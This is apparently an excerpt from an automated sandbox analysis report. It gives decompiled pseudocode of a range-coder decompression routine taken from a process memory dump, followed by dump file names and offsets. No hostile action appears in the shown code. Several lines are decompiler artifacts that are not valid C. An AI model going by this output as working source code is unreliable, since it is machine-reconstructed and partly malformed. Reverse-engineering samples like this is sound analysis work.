											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
